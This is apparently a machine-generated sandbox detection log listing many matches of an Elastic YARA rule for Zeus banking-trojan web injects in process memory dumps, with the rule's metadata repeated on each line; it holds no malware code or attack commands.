Source: 00000002.00000003.2617323227.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2674089655.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2584410332.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.2535763642.0000000002790000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000022.00000002.2697002323.0000000002740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2139570153.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2685802942.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2642126160.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2712084966.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2696066198.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2711910580.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2684054026.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.2555462875.0000000003100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2672453488.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.2561383940.00000000016E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2642540091.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3391439892.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.2632299607.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2683452927.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000014.00000002.2583716021.0000000002650000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2682237093.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2591770836.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2646105043.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.2643934604.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2634522992.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2681497968.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2488750222.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2634738816.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2710792546.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3391439892.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2643292305.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2681300847.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2509383327.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2681891778.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2683874460.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2504620207.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000022.00000002.2695460193.0000000000BD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2636504789.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2680873224.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2684684807.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
